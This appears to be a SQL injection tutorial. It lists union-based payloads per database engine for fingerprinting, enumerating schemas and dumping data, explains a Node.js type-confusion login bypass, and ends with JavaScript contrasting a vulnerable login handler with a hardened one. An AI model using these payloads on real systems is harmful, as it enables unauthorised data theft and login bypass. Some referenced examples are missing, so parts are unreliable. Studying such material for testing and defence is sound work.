SQL Injection
Every request, whether GET, POST, PUT or DELETE, performs a CRUD operation (Create, Read, Update or Delete) on the database of a dynamic web application.
Steps to identify SQL injection
First identify (guess) the SQL query the request is performing.
Try breaking the query using any of the below characters.
Observe the difference in the response between the original request and the request containing the above characters.
If a difference is observed, fix the query so the parameter evaluates back to its original value. If this succeeds, SQL injection is identified.
Union based SQL Injection
Union-based SQL injection is a technique in which the results of an injected SQL query are returned within the application's response.
First identify the number of columns
Next, find a column whose data type can hold string data.
After that, retrieve the data as follows; a concatenation operation can be used when only one column can hold string data.
Examining the database
This involves finding which backend database software is in use and what tables and columns the database contains.
MySQL, Microsoft: ' UNION SELECT @@version--
Oracle: ' UNION SELECT BANNER, NULL FROM v$version--
Postgresql: ' UNION SELECT version()
Finding all database names
This involves finding all database names.
MYSQL: ' UNION SELECT schema_name, NULL FROM information_schema.schemata --
POSTGRESQL: ' UNION SELECT datname, NULL FROM pg_database --
MSSQL: ' UNION SELECT name, NULL FROM master.dbo.sysdatabases --
ORACLE: ' UNION SELECT DISTINCT owner, NULL FROM all_tables --
Finding tables associated with database
After finding the database names, extract the tables of that database.
MYSQL: ' UNION SELECT table_name, NULL FROM information_schema.tables WHERE table_schema = 'database name' --
POSTGRESQL: ' UNION SELECT table_name, NULL FROM information_schema.tables WHERE table_schema = 'database name' --
MSSQL: ' UNION SELECT table_name, NULL FROM <database-name>.information_schema.tables --
ORACLE: ' UNION SELECT DISTINCT table_name, NULL FROM all_tables WHERE owner = 'database-name' --
Finding Columns associated with tables
MYSQL: ' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name = 'table-name' --'
POSTGRESQL: ' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name = 'table-name' --'
MSSQL: ' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name = 'table-name' --'
ORACLE: ' UNION SELECT column_name, NULL FROM all_tab_columns WHERE table_name = 'FLAGS' --'
Dumping column values
Here we are currently in one database and dumping values from columns of another database's table. If instead we are in the same database and need to dump columns from a table of that database, we can simply use SELECT column, column FROM table.
MYSQL: ' UNION SELECT column1, column2 FROM database-name.table-name --'
MSSQL: ' UNION SELECT column1, column2 FROM database-name.table-name --'
POSTGRESQL: ' UNION SELECT column1, column2 FROM database-name.table-name --'
Oracle: ' UNION SELECT column1, column2 FROM database-name.table-name --'
Note: If we are in the same database and need to find its tables, we can just do ' UNION SELECT table_name FROM information_schema.tables--
If we are in one database and need to find the tables of a different database, we first find all databases and then use a WHERE clause: ' UNION SELECT table_name FROM information_schema.tables WHERE table_schema= 'database_name'--
Dumping values into a single column
If we need to dump values into a single column we can use a concatenation operation.
Oracle: 'foo'||'bar'
Microsoft: 'foo'+'bar'
PostgreSQL: 'foo'||'bar'
MySQL: 'foo' 'bar' or CONCAT('foo','bar')
NodeJS SQLI via type confusion
Login bypass
The above query becomes SELECT FROM users WHERE username=admin AND password = password = 1
Here the password parameter is assigned the value 1, so the condition reads (password = password) = 1, i.e. 1=1, which is true for every row and therefore bypasses the login.
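An added illustration of the type confusion described above (not the page's own code and not the driver's code): a minimal imitation of how a Node.js MySQL driver (assumed here to follow the mysql/sqlstring escaping behaviour) expands a ? placeholder, shown for a vulnerable login handler and for a hardened one that rejects non-string credentials before they reach the driver.

```javascript
// Simplified imitation (assumption, not library code) of the driver's escape():
// strings are quoted, numbers pass through, but a plain object is expanded into
// `key` = value pairs. That expansion is the type confusion behind the bypass.
function escapeValue(val) {
  if (typeof val === 'number') return String(val);
  if (typeof val === 'string') return "'" + val.replace(/'/g, "\\'") + "'";
  if (val && typeof val === 'object') {
    // Object -> `key` = value, `key2` = value2 (the dangerous expansion)
    return Object.keys(val)
      .map((k) => '`' + k + '` = ' + escapeValue(val[k]))
      .join(', ');
  }
  throw new TypeError('unsupported value type: ' + typeof val);
}

// Substitute each ? placeholder with the escaped parameter, in order.
function format(sql, params) {
  let i = 0;
  return sql.replace(/\?/g, () => escapeValue(params[i++]));
}

const LOGIN_SQL = 'SELECT * FROM users WHERE username = ? AND password = ?';

// Vulnerable handler: forwards JSON body values to the driver untyped.
function buildLoginQueryVulnerable(body) {
  return format(LOGIN_SQL, [body.username, body.password]);
}

// Hardened handler: credentials must be strings; objects, arrays and
// numbers are rejected, so no `key` = value expansion can ever occur.
function buildLoginQueryHardened(body) {
  const { username, password } = body;
  if (typeof username !== 'string' || typeof password !== 'string') {
    throw new TypeError('username and password must be strings');
  }
  return format(LOGIN_SQL, [username, password]);
}

// Constructed sample bodies: a normal JSON login and one where the
// password field carries an object instead of a string.
const normalBody = { username: 'admin', password: 'secret' };
const confusedBody = { username: 'admin', password: { password: 1 } };

// Returns the SQL the vulnerable handler would send in both cases.
function demo() {
  return {
    normal: buildLoginQueryVulnerable(normalBody),
    confused: buildLoginQueryVulnerable(confusedBody),
  };
}
```

The "confused" query ends in password = `password` = 1, the shape the text above describes; the hardened handler throws on that body instead of building a query.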